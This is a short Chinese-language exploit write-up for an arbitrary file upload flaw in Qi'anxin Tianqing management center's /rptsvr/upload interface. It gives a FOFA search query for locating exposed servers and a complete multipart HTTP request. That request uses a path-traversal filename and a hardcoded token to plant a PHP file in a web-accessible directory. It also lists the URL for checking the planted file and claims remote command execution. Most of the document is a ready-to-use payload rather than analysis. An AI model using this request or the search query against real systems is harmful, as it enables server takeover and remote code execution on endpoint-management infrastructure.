Q6-1奇安信-天擎-文件上传

漏洞描述：

奇安信 天擎管理中心 rptsvr接口存在任意文件上传漏洞，可上传恶意文件至服务器，执行脚本文件可远程命令执行，造成服务器失陷。

影响版本：

version <=V6.7.0.4130   

网站图片:

网络测绘:

fofa语法：

FOFA：icon_hash=“-829652342”

漏洞复现:

payload：

POST /rptsvr/upload HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (MacintoshT2lkQm95Rw==; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data;boundary=---------------------------55433477442814818502792421460
Upgrade-Insecure-Requests: 1

-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="uploadfile"; filename=".//application/api/controllers/a.php"
Content-Type: text/x-python

<?php phpinfo();?>
-----------------------------55433477442814818502792421460
Content-Disposition: form-data; name="token"

skylar_report
-----------------------------55433477442814818502792421460

效果图:

验证url

/application/api/controllers/a.php

RCE